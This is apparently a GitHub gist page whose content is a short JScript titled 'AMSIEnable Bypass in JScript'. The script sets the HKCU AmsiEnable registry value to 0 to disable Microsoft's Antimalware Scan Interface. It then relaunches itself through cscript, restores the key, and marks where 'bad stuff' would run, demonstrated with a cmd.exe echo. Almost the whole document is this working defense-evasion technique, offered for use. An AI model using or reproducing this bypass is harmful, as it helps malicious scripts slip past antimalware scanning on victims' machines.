Skip to content

Instantly share code, notes, and snippets.

Created August 16, 2018 17:14
  • Star 5 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
AMSIEnable Bypass in JScript
var sh = new ActiveXObject('WScript.Shell');
var key = "HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable";
var AmsiEnable = sh.RegRead(key);
throw new Error(1, '');
sh.RegWrite(key, 0, "REG_DWORD"); // neuter AMSI
sh.Run("cscript -e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58} "+WScript.ScriptFullName,0,1); // blocking call to Run()
sh.RegWrite(key, 1, "REG_DWORD"); // put it back
// do bad stuff below
sh.Run("cmd.exe /k echo AMSI bypassed :)")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment